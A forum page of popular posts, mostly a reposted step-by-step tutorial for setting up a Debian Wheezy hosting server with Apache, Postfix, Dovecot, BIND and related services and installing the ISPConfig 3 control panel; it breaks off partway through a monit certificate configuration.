Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 06/07/14 in all areas

  1. LLegoLLaS
    Elohim nu stiu cum ti-a dat 2010... 4100
    1 point
  2. Elohim
    4100 ! )
    1 point
  3. Nytro
    Fara UP-uri. Warn pentru FIECARE up sau post inutil pe post de "up" il vad.
    1 point
  4. askwrite
    This tutorial shows how to prepare a Debian Wheezy server with Apache2, BIND, Dovecot for the installation of ISPConfig 3, and how to install ISPConfig 3. ISPConfig 3 is a webhosting control panel that allows you to configure the following services through a web browser: Apache or nginx web server, Postfix mail server, Courier or Dovecot IMAP/POP3 server, MySQL, BIND or MyDNS nameserver, PureFTPd, SpamAssassin, ClamAV, and many more. Install The SSH Server If you did not install the OpenSSH server during the system installation, you can do it now: apt-get install ssh openssh-server From now on you can use an SSH client such as PuTTY and connect from your workstation to your Debian Wheezy server and follow the remaining steps from this tutorial. Configure The Network Because the Debian Wheezy installer has configured our system to get its network settings via DHCP, we have to change that now because a server should have a static IP address. Edit/etc/network/interfaces and adjust it to your needs (in this example setup I will use the IP address 192.168.1.100) (please note that I replace allow-hotplug eth0 with auto eth0; otherwise restarting the network doesn’t work, and we’d have to reboot the whole system): nano /etc/network/interfaces # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). # The loopback network interface auto lo iface lo inet loopback # The primary network interface #allow-hotplug eth0 #iface eth0 inet dhcp auto eth0 iface eth0 inet static address 192.168.1.100 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 Then restart your network: /etc/init.d/networking restart Edit /etc/hosts. Make it look like this: nano /etc/hosts 127.0.0.1 localhost.localdomain localhost 192.168.0.100 demo.server.com demo # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters Now run: echo demo.server.com > /etc/hostname /etc/init.d/hostname.sh start Afterwards, run hostname hostname -f It is important that both show demo.server.com now! Update Your Debian Installation First make sure that your /etc/apt/sources.list contains the wheezy-updates repository (this makes sure you always get the newest updates for the ClamAV virus scanner – this project publishes releases very often, and sometimes old versions stop working), and that the contrib and non-free repositories are enabled (some packages such as libapache2-mod-fastcgi are not in the main repository). nano /etc/apt/sources.list deb http://ftp.de.debian.org/debian/ wheezy main contrib non-free deb-src http://ftp.de.debian.org/debian/ wheezy main contrib non-free deb http://security.debian.org/ wheezy/updates main contrib non-free deb-src http://security.debian.org/ wheezy/updates main contrib non-free # wheezy-updates, previously known as 'volatile' deb http://ftp.de.debian.org/debian/ wheezy-updates main contrib non-free deb-src http://ftp.de.debian.org/debian/ wheezy-updates main contrib non-free Run apt-get update to update the apt package database and apt-get upgrade to install the latest updates (if there are any). Synchronize the System Clock It is a good idea to synchronize the system clock with an NTP (network time protocol) server over the Internet. Simply run apt-get install ntp ntpdate and your system time will always be in sync. Install Postfix, Dovecot, MySQL, phpMyAdmin, rkhunter, binutils We can install Postfix, Dovecot, MySQL, rkhunter, and binutils with a single command: apt-get install postfix postfix-mysql postfix-doc mysql-client mysql-server openssl getmail4 rkhunter binutils dovecot-imapd dovecot-pop3d dovecot-mysql dovecot-sieve sudo You will be asked the following questions: Next open the TLS/SSL and submission ports in Postfix: nano /etc/postfix/master.cf Uncomment the submission and smtps sections as follows (leave -o milter_macro_daemon_name=ORIGINATING as we don’t need it): [...] submission inet n - - - - smtpd -o syslog_name=postfix/submission -o smtpd_tls_security_level=encrypt -o smtpd_sasl_auth_enable=yes -o smtpd_client_restrictions=permit_sasl_authenticated,reject # -o milter_macro_daemon_name=ORIGINATING smtps inet n - - - - smtpd -o syslog_name=postfix/smtps -o smtpd_tls_wrappermode=yes -o smtpd_sasl_auth_enable=yes -o smtpd_client_restrictions=permit_sasl_authenticated,reject # -o milter_macro_daemon_name=ORIGINATING [...] Restart Postfix afterwards: /etc/init.d/postfix restart We want MySQL to listen on all interfaces, not just localhost, therefore we edit /etc/mysql/my.cnf and comment out the line bind-address = 127.0.0.1: nano /etc/mysql/my.cnf [...] # Instead of skip-networking the default is now to listen only on # localhost which is more compatible and is not less secure. #bind-address = 127.0.0.1 [...] Then we restart MySQL: /etc/init.d/mysql restart Now check that networking is enabled. Run The output should look like this: root@demo:~# netstat -tap | grep mysql tcp 0 0 *:mysql * LISTEN 26757/mysqld root@server1:~# Install Amavisd-new, SpamAssassin, And Clamav To install amavisd-new, SpamAssassin, and ClamAV, we run apt-get install amavisd-new spamassassin clamav clamav-daemon zoo unzip bzip2 arj nomarch lzop cabextract apt-listchanges libnet-ldap-perl libauthen-sasl-perl clamav-docs daemon libio-string-perl libio-socket-ssl-perl libnet-ident-perl zip libnet-dns-perl The ISPConfig 3 setup uses amavisd which loads the SpamAssassin filter library internally, so we can stop SpamAssassin to free up some RAM: /etc/init.d/spamassassin stop update-rc.d -f spamassassin remove Install Apache2, PHP5, phpMyAdmin, FCGI, suExec, Pear, And mcrypt Apache2, PHP5, phpMyAdmin, FCGI, suExec, Pear, and mcrypt can be installed as follows: apt-get install apache2 apache2.2-common apache2-doc apache2-mpm-prefork apache2-utils libexpat1 ssl-cert libapache2-mod-php5 php5 php5-common php5-gd php5-mysql php5-imap phpmyadmin php5-cli php5-cgi libapache2-mod-fcgid apache2-suexec php-pear php-auth php5-mcrypt mcrypt php5-imagick imagemagick libapache2-mod-suphp libruby libapache2-mod-ruby libapache2-mod-python php5-curl php5-intl php5-memcache php5-memcached php5-ming php5-ps php5-pspell php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl memcached You will see the following question: Web server to reconfigure automatically: <-- apache2 Configure database for phpmyadmin with dbconfig-common? <-- No Then run the following command to enable the Apache modules suexec, rewrite, ssl, actions, and include (plus dav, dav_fs, and auth_digest if you want to use WebDAV): Next open /etc/apache2/mods-available/suphp.conf… nano /etc/apache2/mods-available/suphp.conf … and comment out the <FilesMatch “.ph(p3?|tml)$”> section and add the line AddType application/x-httpd-suphp .php .php3 .php4 .php5 .phtml - otherwise all PHP files will be run by SuPHP: <IfModule mod_suphp.c> #<FilesMatch ".ph(p3?|tml)$"> # SetHandler application/x-httpd-suphp #</FilesMatch> AddType application/x-httpd-suphp .php .php3 .php4 .php5 .phtml suPHP_AddHandler application/x-httpd-suphp <Directory /> suPHP_Engine on </Directory> # By default, disable suPHP for debian packaged web applications as files # are owned by root and cannot be executed by suPHP because of min_uid. <Directory /usr/share> suPHP_Engine off </Directory> # # Use a specific php config file (a dir which contains a php.ini file) # suPHP_ConfigPath /etc/php5/cgi/suphp/ # # Tells mod_suphp NOT to handle requests with the type <mime-type>. # suPHP_RemoveHandler <mime-type> </IfModule> Restart Apache afterwards: /etc/init.d/apache2 restart If you want to host Ruby files with the extension .rb on your web sites created through ISPConfig, you must comment out the line application/x-ruby rb in /etc/mime.types: nano /etc/mime.types [...] #application/x-ruby rb [...] (This is needed only for .rb files; Ruby files with the extension .rbx work out of the box.) Restart Apache afterwards: /etc/init.d/apache2 restart Xcache Xcache is a free and open PHP opcode cacher for caching and optimizing PHP intermediate code. It’s similar to other PHP opcode cachers, such as eAccelerator and APC. It is strongly recommended to have one of these installed to speed up your PHP page. Xcache can be installed as follows: apt-get install php5-xcache Now restart Apache: /etc/init.d/apache2 restart PHP-FPM Starting with ISPConfig 3.0.5, there is an additional PHP mode that you can select for usage with Apache: PHP-FPM. To use PHP-FPM with Apache, we need the mod_fastcgi Apache module (please don’t mix this up with mod_fcgid – they are very similar, but you cannot use PHP-FPM with mod_fcgid). We can install PHP-FPM and mod_fastcgi as follows: apt-get install libapache2-mod-fastcgi php5-fpm Make sure you enable the module and restart Apache: a2enmod actions fastcgi alias /etc/init.d/apache2 restart Install Mailman Since version 3.0.4, ISPConfig also allows you to manage (create/modify/delete) Mailman mailing lists. If you want to make use of this feature, install Mailman as follows: apt-get install mailman Select at least one language, e.g.: Languages to support: <-- en (English) Missing site list <-- Ok< Before we can start Mailman, a first mailing list called mailman must be created: newlist mailman root@demo:~# newlist mailman Enter the email of the person running the list: <-- admin email address, e.g. listadmin@server.com Initial mailman password: <-- admin password for the mailman list To finish creating your mailing list, you must edit your /etc/aliases (or equivalent) file by adding the following lines, and possibly running the `newaliases' program: ## mailman mailing list mailman: "|/var/lib/mailman/mail/mailman post mailman" mailman-admin: "|/var/lib/mailman/mail/mailman admin mailman" mailman-bounces: "|/var/lib/mailman/mail/mailman bounces mailman" mailman-confirm: "|/var/lib/mailman/mail/mailman confirm mailman" mailman-join: "|/var/lib/mailman/mail/mailman join mailman" mailman-leave: "|/var/lib/mailman/mail/mailman leave mailman" mailman-owner: "|/var/lib/mailman/mail/mailman owner mailman" mailman-request: "|/var/lib/mailman/mail/mailman request mailman" mailman-subscribe: "|/var/lib/mailman/mail/mailman subscribe mailman" mailman-unsubscribe: "|/var/lib/mailman/mail/mailman unsubscribe mailman" Hit enter to notify mailman owner... <-- ENTER root@demo:~# Open /etc/aliases afterwards… nano /etc/aliases … and add the following lines: [...] ## mailman mailing list mailman: "|/var/lib/mailman/mail/mailman post mailman" mailman-admin: "|/var/lib/mailman/mail/mailman admin mailman" mailman-bounces: "|/var/lib/mailman/mail/mailman bounces mailman" mailman-confirm: "|/var/lib/mailman/mail/mailman confirm mailman" mailman-join: "|/var/lib/mailman/mail/mailman join mailman" mailman-leave: "|/var/lib/mailman/mail/mailman leave mailman" mailman-owner: "|/var/lib/mailman/mail/mailman owner mailman" mailman-request: "|/var/lib/mailman/mail/mailman request mailman" mailman-subscribe: "|/var/lib/mailman/mail/mailman subscribe mailman" mailman-unsubscribe: "|/var/lib/mailman/mail/mailman unsubscribe mailman" Run newaliases afterwards and restart Postfix: /etc/init.d/postfix restart Finally we must enable the Mailman Apache configuration: ln -s /etc/mailman/apache.conf /etc/apache2/conf.d/mailman.conf This defines the alias /cgi-bin/mailman/ for all Apache vhosts, which means you can access the Mailman admin interface for a list at http://<vhost>/cgi-bin/mailman/admin/<listname>, and the web page for users of a mailing list can be found at http://<vhost>/cgi-bin/mailman/listinfo/<listname>. Under http://<vhost>/pipermail you can find the mailing list archives. Restart Apache afterwards: /etc/init.d/apache2 restart Then start the Mailman daemon: Install PureFTPd And Quota PureFTPd and quota can be installed with the following command: apt-get install pure-ftpd-common pure-ftpd-mysql quota quotatool Edit the file /etc/default/pure-ftpd-common… nano /etc/default/pure-ftpd-common … and make sure that the start mode is set to standalone and set VIRTUALCHROOT=true: [...] STANDALONE_OR_INETD=standalone [...] VIRTUALCHROOT=true [...] Now we configure PureFTPd to allow FTP and TLS sessions. FTP is a very insecure protocol because all passwords and all data are transferred in clear text. By using TLS, the whole communication can be encrypted, thus making FTP much more secure. If you want to allow FTP and TLS sessions, run echo 1 > /etc/pure-ftpd/conf/TLS In order to use TLS, we must create an SSL certificate. I create it in /etc/ssl/private/, therefore I create that directory first: mkdir -p /etc/ssl/private/ Afterwards, we can generate the SSL certificate as follows: openssl req -x509 -nodes -days 7300 -newkey rsa:2048 -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem Country Name (2 letter code) [AU]: <-- Enter your Country Name (e.g., "AQ"). State or Province Name (full name) [Some-State]: <-- Enter your State or Province Name. Locality Name (eg, city) []: <-- Enter your City. Organization Name (eg, company) [Internet Widgits Pty Ltd]: <-- Enter your ON (Name of your company) Organizational Unit Name (eg, section) []: <-- Enter your OU Name (e.g. "IT Department"). Common Name (eg, YOUR name) []: <-- Enter the FQDN (e.g. "demo.server.com"). Email Address []: <-- Enter your Email Address. Change the permissions of the SSL certificate: chmod 600 /etc/ssl/private/pure-ftpd.pem Then restart PureFTPd: /etc/init.d/pure-ftpd-mysql restart Edit /etc/fstab. Mine looks like this (I added ,usrjquota=quota.user,grpjquota=quota.group,jqfmt=vfsv0 to the partition with the mount point /): nano /etc/fstab # /etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if disks are added and removed. See fstab(5). # # <file system> <mount point> <type> <options> <dump> <pass> /dev/mapper/demo-root / ext4 errors=remount-ro,usrjquota=quota.user,grpjquota=quota.group,jqfmt=vfsv0 0 1 # /boot was on /dev/sda1 during installation UUID=46d1bd79-d761-4b23-80b8-ad20cb18e049 /boot ext2 defaults 0 2 /dev/mapper/server1-swap_1 none swap sw 0 0 /dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0 To enable quota, run these commands: mount -o remount / quotacheck -avugm quotaon -avug Install BIND DNS Server BIND can be installed as follows: apt-get install bind9 dnsutils Install Vlogger, Webalizer, And AWstats Vlogger, webalizer, and AWstats can be installed as follows: apt-get install vlogger webalizer awstats geoip-database libclass-dbi-mysql-perl Open /etc/cron.d/awstats afterwards… nano /etc/cron.d/awstats … and comment out everything in that file: #MAILTO=root #*/10 * * * * www-data [ -x /usr/share/awstats/tools/update.sh ] && /usr/share/awstats/tools/update.sh # Generate static reports: #10 03 * * * www-data [ -x /usr/share/awstats/tools/buildstatic.sh ] && /usr/share/awstats/tools/buildstatic.sh Install Jailkit Jailkit is needed only if you want to chroot SSH users. It can be installed as follows (important: Jailkit must be installed before ISPConfig – it cannot be installed afterwards!): apt-get install build-essential autoconf automake1.9 libtool flex bison debhelper binutils-gold cd /tmp wget http://olivier.sessink.nl/jailkit/jailkit-2.15.tar.gz tar xvfz jailkit-2.15.tar.gz cd jailkit-2.15 ./debian/rules binary You can now install the Jailkit .deb package as follows: cd .. dpkg -i jailkit_2.15-1_*.deb rm -rf jailkit-2.15* Install fail2ban This is optional but recommended, because the ISPConfig monitor tries to show the log: apt-get install fail2ban To make fail2ban monitor PureFTPd and Dovecot, create the file /etc/fail2ban/jail.local: nano /etc/fail2ban/jail.local [pureftpd] enabled = true port = ftp filter = pureftpd logpath = /var/log/syslog maxretry = 3 [dovecot-pop3imap] enabled = true filter = dovecot-pop3imap action = iptables-multiport[name=dovecot-pop3imap, port="pop3,pop3s,imap,imaps", protocol=tcp] logpath = /var/log/mail.log maxretry = 5 [sasl] enabled = true port = smtp filter = sasl logpath = /var/log/mail.log maxretry = 3 Then create the following two filter files: nano /etc/fail2ban/filter.d/pureftpd.conf [Definition] failregex = .*pure-ftpd: (.*@<HOST>) [WARNING] Authentication failed for user.* ignoreregex = nano /etc/fail2ban/filter.d/dovecot-pop3imap.conf [Definition] failregex = (?: pop3-login|imap-login): .*(?:Authentication failure|Aborted login (auth failed|Aborted login (tried to use disabled|Disconnected (auth failed|Aborted login (d+ authentication attempts).*rip=(?P<host>S*),.* ignoreregex = Restart fail2ban afterwards: /etc/init.d/fail2ban restart Install SquirrelMail To install the SquirrelMail webmail client, run apt-get install squirrelmail Then configure SquirrelMail: squirrelmail-configure We must tell SquirrelMail that we are using Dovecot-IMAP/-POP3: SquirrelMail Configuration : Read: config.php (1.4.0) --------------------------------------------------------- Main Menu -- 1. Organization Preferences 2. Server Settings 3. Folder Defaults 4. General Options 5. Themes 6. Address Books 7. Message of the Day (MOTD) 8. Plugins 9. Database 10. Languages D. Set pre-defined settings for specific IMAP servers C Turn color on S Save data Q Quit Command >> <-- D SquirrelMail Configuration : Read: config.php --------------------------------------------------------- While we have been building SquirrelMail, we have discovered some preferences that work better with some servers that don't work so well with others. If you select your IMAP server, this option will set some pre-defined settings for that server. Please note that you will still need to go through and make sure everything is correct. This does not change everything. There are only a few settings that this will change. Please select your IMAP server: bincimap = Binc IMAP server courier = Courier IMAP server cyrus = Cyrus IMAP server dovecot = Dovecot Secure IMAP server exchange = Microsoft Exchange IMAP server hmailserver = hMailServer macosx = Mac OS X Mailserver mercury32 = Mercury/32 uw = University of Washington's IMAP server gmail = IMAP access to Google mail (Gmail) accounts quit = Do not change anything Command >> <-- dovecot SquirrelMail Configuration : Read: config.php --------------------------------------------------------- While we have been building SquirrelMail, we have discovered some preferences that work better with some servers that don't work so well with others. If you select your IMAP server, this option will set some pre-defined settings for that server. Please note that you will still need to go through and make sure everything is correct. This does not change everything. There are only a few settings that this will change. Please select your IMAP server: bincimap = Binc IMAP server courier = Courier IMAP server cyrus = Cyrus IMAP server dovecot = Dovecot Secure IMAP server exchange = Microsoft Exchange IMAP server hmailserver = hMailServer macosx = Mac OS X Mailserver mercury32 = Mercury/32 uw = University of Washington's IMAP server gmail = IMAP access to Google mail (Gmail) accounts quit = Do not change anything Command >> dovecot imap_server_type = dovecot default_folder_prefix = <none> trash_folder = Trash sent_folder = Sent draft_folder = Drafts show_prefix_option = false default_sub_of_inbox = false show_contain_subfolders_ option = false optional_ delimiter = detect delete_folder = false Press any key to continue... <-- press a key SquirrelMail Configuration : Read: config.php (1.4.0) --------------------------------------------------------- Main Menu -- 1. Organization Preferences 2. Server Settings 3. Folder Defaults 4. General Options 5. Themes 6. Address Books 7. Message of the Day (MOTD) 8. Plugins 9. Database 10. Languages D. Set pre-defined settings for specific IMAP servers C Turn color on S Save data Q Quit Command >> <-- S SquirrelMail Configuration : Read: config.php (1.4.0) --------------------------------------------------------- Main Menu -- 1. Organization Preferences 2. Server Settings 3. Folder Defaults 4. General Options 5. Themes 6. Address Books 7. Message of the Day (MOTD) 8. Plugins 9. Database 10. Languages D. Set pre-defined settings for specific IMAP servers C Turn color on S Save data Q Quit Command >> <-- Q Now we will configure SquirrelMail so that you can use it from within your web sites (created through ISPConfig) by using the /squirrelmail or /webmail aliases. So if your website is www.server.com, you will be able to access SquirrelMail using www.server.com/squirrelmail or www.server.com/webmail. SquirrelMail’s Apache configuration is in the file /etc/squirrelmail/apache.conf, but this file isn’t loaded by Apache because it is not in the /etc/apache2/conf.d/ directory. Therefore we create a symlink called squirrelmail.conf in the /etc/apache2/conf.d/ directory that points to /etc/squirrelmail/apache.conf and reload Apache afterwards: cd /etc/apache2/conf.d/ ln -s ../../squirrelmail/apache.conf squirrelmail.conf /etc/init.d/apache2 reload Now open /etc/apache2/conf.d/squirrelmail.conf… nano /etc/apache2/conf.d/squirrelmail.conf … and add the following lines to the <Directory /usr/share/squirrelmail></Directory> container that make sure that mod_php is used for accessing SquirrelMail, regardless of what PHP mode you select for your website in ISPConfig: [...] <Directory /usr/share/squirrelmail> Options FollowSymLinks <IfModule mod_php5.c> AddType application/x-httpd-php .php php_flag magic_quotes_gpc Off php_flag track_vars On php_admin_flag allow_url_fopen Off php_value include_path . php_admin_value upload_tmp_dir /var/lib/squirrelmail/tmp php_admin_value open_basedir /usr/share/squirrelmail:/etc/squirrelmail:/var/lib/squirrelmail:/etc/hostname:/etc/mailname php_flag register_globals off </IfModule> <IfModule mod_dir.c> DirectoryIndex index.php </IfModule> # access to configtest is limited by default to prevent information leak <Files configtest.php> order deny,allow deny from all allow from 127.0.0.1 </Files> </Directory> [...] Create the directory /var/lib/squirrelmail/tmp… mkdir /var/lib/squirrelmail/tmp … and make it owned by the user www-data: chown www-data /var/lib/squirrelmail/tmp Reload Apache again: /etc/init.d/apache2 reload That’s it already - /etc/apache2/conf.d/squirrelmail.conf defines an alias called /squirrelmail that points to SquirrelMail’s installation directory /usr/share/squirrelmail. You can now access SquirrelMail from your web site as follows: http://192.168.1.100/squirrelmail http://www.server.com/squirrelmail You can also access it from the ISPConfig control panel vhost (after you have installed ISPConfig, see the next chapter) as follows (this doesn’t need any configuration in ISPConfig): http://demo.server.com:8080/squirrelmail If you’d like to use the alias /webmail instead of /squirrelmail, simply open /etc/apache2/conf.d/squirrelmail.conf… nano /etc/apache2/conf.d/squirrelmail.conf … and add the line Alias /webmail /usr/share/squirrelmail: Alias /squirrelmail /usr/share/squirrelmail Alias /webmail /usr/share/squirrelmail [...] Then reload Apache: /etc/init.d/apache2 reload Now you can access Squirrelmail as follows: http://192.168.1.100/webmail http://www.server.com/webmail http://demo.server.com:8080/webmail (after you have installed ISPConfig, see the next chapter) If you’d like to define a vhost like webmail.example.com where your users can access SquirrelMail, you’d have to add the following vhost configuration to/etc/apache2/conf.d/squirrelmail.conf: nano /etc/apache2/conf.d/squirrelmail.conf [...] <VirtualHost 1.2.3.4:80> DocumentRoot /usr/share/squirrelmail ServerName webmail.example.com </VirtualHost> Make sure you replace 1.2.3.4 with the correct IP address of your server. Of course, there must be a DNS record for webmail.example.com that points to the IP address that you use in the vhost configuration. Also make sure that the vhost webmail.example.com does not exist in ISPConfig (otherwise both vhosts will interfere with each other!). Now reload Apache… /etc/init.d/apache2 reload … and you can access SquirrelMail under http://webmail.server.com! Install ISPConfig 3 To install ISPConfig 3 from the latest released version, do this: cd /tmp wget http://www.ispconfig.org/downloads/ISPConfig-3-stable.tar.gz tar xfz ISPConfig-3-stable.tar.gz cd ispconfig3_install/install/ The next step is to run php -q install.php This will start the ISPConfig 3 installer. The installer will configure all services like Postfix, Dovecot, etc. for you. A manual setup as required for ISPConfig 2 (perfect setup guides) is not necessary. root@demo:/tmp/ispconfig3_install/install# php -q install.php PHP Deprecated: Comments starting with '#' are deprecated in /etc/php5/cli/conf.d/ming.ini on line 1 in Unknown on line 0 -------------------------------------------------------------------------------- _____ ___________ _____ __ _ ____ |_ _/ ___| ___ / __ / _(_) /__ | | `--.| |_/ / | / / ___ _ __ | |_ _ __ _ _/ / | | `--. __/ | | / _ | '_ | _| |/ _` | |_ | _| |_/__/ / | | __/ (_) | | | | | | | (_| | ___ ___/____/_| ____/___/|_| |_|_| |_|__, | ____/ __/ | |___/ -------------------------------------------------------------------------------- >> Initial configuration Operating System: Debian or compatible, unknown version. Following will be a few questions for primary configuration so be careful. Default values are in [brackets] and can be accepted with <ENTER>. Tap in "quit" (without the quotes) to stop the installer. Select language (en,de) [en]: <-- ENTER Installation mode (standard,expert) [standard]: <-- ENTER Full qualified hostname (FQDN) of the server, eg server1.domain.tld [demo.server.com]: <-- ENTER MySQL server hostname [localhost]: <-- ENTER MySQL root username [root]: <-- ENTER MySQL root password []: <-- yourrootsqlpassword MySQL database to create [dbispconfig]: <-- ENTER MySQL charset [utf8]: <-- ENTER Generating a 4096 bit RSA private key .............................................................++ .........................................................................................................................++ writing new private key to 'smtpd.key' ----- You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]: <-- ENTER State or Province Name (full name) [Some-State]: <-- ENTER Locality Name (eg, city) []: <-- ENTER Organization Name (eg, company) [Internet Widgits Pty Ltd]: <-- ENTER Organizational Unit Name (eg, section) []: <-- ENTER Common Name (e.g. server FQDN or YOUR name) []: <-- ENTER Email Address []: <-- ENTER Configuring Jailkit Configuring Dovecot Configuring Spamassassin Configuring Amavisd Configuring Getmail Configuring Pureftpd Configuring BIND Configuring Apache Configuring Vlogger Configuring Apps vhost Configuring Bastille Firewall Configuring Fail2ban Installing ISPConfig ISPConfig Port [8080]: <-- ENTER Do you want a secure (SSL) connection to the ISPConfig web interface (y,n) [y]: <-- ENTER Generating RSA private key, 4096 bit long modulus .................................................................................................++ ........++ e is 65537 (0x10001) You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]: <-- ENTER State or Province Name (full name) [Some-State]: <-- ENTER Locality Name (eg, city) []: <-- ENTER Organization Name (eg, company) [Internet Widgits Pty Ltd]: <-- ENTER Organizational Unit Name (eg, section) []: <-- ENTER Common Name (e.g. server FQDN or YOUR name) []: <-- ENTER Email Address []: <-- ENTER Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []: <-- ENTER An optional company name []: <-- ENTER writing RSA key Configuring DBServer Installing ISPConfig crontab no crontab for root no crontab for getmail Restarting services ... Stopping MySQL database server: mysqld. Starting MySQL database server: mysqld .. Checking for tables which need an upgrade, are corrupt or were not closed cleanly.. Stopping Postfix Mail Transport Agent: postfix. Starting Postfix Mail Transport Agent: postfix. Stopping amavisd: amavisd-new. Starting amavisd: amavisd-new. Stopping ClamAV daemon: clamd. Starting ClamAV daemon: clamd . Restarting IMAP/POP3 mail server: dovecot. [Tue May 07 02:36:22 2013] [warn] NameVirtualHost *:443 has no VirtualHosts [Tue May 07 02:36:22 2013] [warn] NameVirtualHost *:80 has no VirtualHosts [Tue May 07 02:36:23 2013] [warn] NameVirtualHost *:443 has no VirtualHosts [Tue May 07 02:36:23 2013] [warn] NameVirtualHost *:80 has no VirtualHosts Restarting web server: apache2 ... waiting . Restarting ftp server: Running: /usr/sbin/pure-ftpd-mysql-virtualchroot -l mysql:/etc/pure-ftpd/db/mysql.conf -l pam -H -O clf:/var/log/pure-ftpd/transfer.log -Y 1 -D -u 1000 -A -E -b -8 UTF-8 -B Installation completed. root@server1:/tmp/ispconfig3_install/install# The installer automatically configures all underlying services, so no manual configuration is needed. You now also have the possibility to let the installer create an SSL vhost for the ISPConfig control panel, so that ISPConfig can be accessed using https:// instead of http://. To achieve this, just press ENTER when you see this question: Do you want a secure (SSL) connection to the ISPConfig web interface (y,n) [y]:. Afterwards you can access ISPConfig 3 under http(s)://demo.server.com:8080/ or http(s)://192.168.0.100:8080/ ( http or https depends on what you chose during installation). Log in with the username admin and the password admin (you should change the default password after your first login): In order to learn how to use ISPConfig 3, I strongly recommend to download the ISPConfig 3 Manual. Install And Configure munin To install munin on Debian Lenny, we do this: aptitude install munin munin-node Next, we must edit the munin configuration file /etc/munin/munin.conf. We want munin to put its output into the directory /var/www/www.server.com/web/monitoring, therefore we change the value of htmldir, and we want it to use the name demo.server.com instead of localhost.localdomain in the HTML output, therefore we replace localhost.localdomain with demo.server.com. Without the comments, the changed file looks like this: nano /etc/munin/munin.conf dbdir /var/lib/munin htmldir /var/www/www.example.com/web/monitoring logdir /var/log/munin rundir /var/run/munin tmpldir /etc/munin/templates [server1.example.com] address 127.0.0.1 use_node_name yes Next we create the directory /var/www/www.server.com/web/monitoring and change its ownership to the user and group munin, otherwise munin cannot place its output in that directory. Then we restart munin: mkdir -p /var/www/www.server.com/web/monitoring chown munin:munin /var/www/www.server.com/web/monitoring /etc/init.d/munin-node restart Now wait a few minutes so that munin can produce its first output, and then go to http://www.example.com/monitoring/ in your browser, and you see the first statistics. After a few days this could look like this: Password-Protect The munin Output Directory Now it is a good idea to password-protect the directory /var/www/www.server.com/web/monitoring unless you want everybody to be able to see every little statistic about your server. To do this, we create an .htaccess file in /var/www/www.server.com/web/monitoring: nano /var/www/www.server.com/web/monitoring/.htaccess AuthType Basic AuthName "Members Only" AuthUserFile /var/www/www.server.com/.htpasswd <limit GET PUT POST> require valid-user </limit> Then we must create the password file /var/www/www.example.com/.htpasswd. We want to log in with the username admin, so we do this: htpasswd -c /var/www/www.example.com/.htpasswd admin Enter a password for admin, and you’re done! Install And Configure monit To install monit, we do this: aptitude install monit Now we must edit /etc/monit/monitrc. The default /etc/monit/monitrc has lots of examples, and you can find more configuration examples on Monit - utility for monitoring services on a Unix system. However, in my case I want to monitor proftpd, sshd, mysql, apache, and postfix, I want to enable the monit web interface on port 2812, I want a https web interface, I want to log in to the web interface with the username admin and the password test, and I want monit to send email alerts to root@demo, so my file looks like this: cp /etc/monit/monitrc /etc/monit/monitrc_orig cat /dev/null > /etc/monit/monitrc vi /etc/monit/monitrc set daemon 60 set logfile syslog facility log_daemon set mailserver localhost set mail-format { from: monit@demo.server.com } set alert root@localhost set httpd port 2812 and ssl enable PEMFILE /var/certs/monit.pem allow admin:test check process proftpd with pidfile /var/run/proftpd.pid start program = "/etc/init.d/proftpd start" stop program = "/etc/init.d/proftpd stop" if failed port 21 protocol ftp then restart if 5 restarts within 5 cycles then timeout check process sshd with pidfile /var/run/sshd.pid start program "/etc/init.d/ssh start" stop program "/etc/init.d/ssh stop" if failed port 22 protocol ssh then restart if 5 restarts within 5 cycles then timeout check process mysql with pidfile /var/run/mysqld/mysqld.pid group database start program = "/etc/init.d/mysql start" stop program = "/etc/init.d/mysql stop" if failed host 127.0.0.1 port 3306 then restart if 5 restarts within 5 cycles then timeout check process apache with pidfile /var/run/apache2.pid group www start program = "/etc/init.d/apache2 start" stop program = "/etc/init.d/apache2 stop" if failed host www.example.com port 80 protocol http and request "/monit/token" then restart if cpu is greater than 60% for 2 cycles then alert if cpu > 80% for 5 cycles then restart if totalmem > 500 MB for 5 cycles then restart if children > 250 then restart if loadavg(5min) greater than 10 for 8 cycles then stop if 3 restarts within 5 cycles then timeout check process postfix with pidfile /var/spool/postfix/pid/master.pid group mail start program = "/etc/init.d/postfix start" stop program = "/etc/init.d/postfix stop" if failed port 25 protocol smtp then restart if 5 restarts within 5 cycles then timeout The configuration file is pretty self-explaining; if you are unsure about an option, take a look at the monit documentation: Monit - utility for monitoring services on a Unix system In the apache part of the monit configuration you find this: if failed host www.server.com port 80 protocol http and request "/monit/token" then restart which means that monit tries to connect to www.server.com on port 80 and tries to access the file /monit/token which is /var/www/www.server.com/web/monit/token because our web site’s document root is /var/www/www.server.com/web. If monit doesn’t succeed it means Apache isn’t running, and monit is going to restart it. Now we must create the file/var/www/www.server.com/web/monit/token and write some random string into it: mkdir /var/www/www.server.com/web/monit echo "hello" > /var/www/www.server.com/web/monit/token Next we create the pem cert (/var/certs/monit.pem) we need for the SSL-encrypted monit web interface: mkdir /var/certs cd /var/certs We need an OpenSSL configuration file to create our certificate. It can look like this: nano /var/certs/monit.cnf # create RSA certs - Server RANDFILE = ./openssl.rnd [ req ] default_bits = 1024 encrypt_key = yes distinguished_name = req_dn x509_extensions = cert_type [ req_dn ] countryName = Country Name (2 letter code) countryName_default = MO stateOrProvinceName = State or Province Name (full name) stateOrProvinceName_default = Monitoria localityName = Locality Name (eg, city) localityName_default = Monittown organizationName = Organization Name (eg, company) organizationName_default = Monit Inc. organizationalUnitName = Organizational Unit Name (eg, section) organizationalUnitName_default = 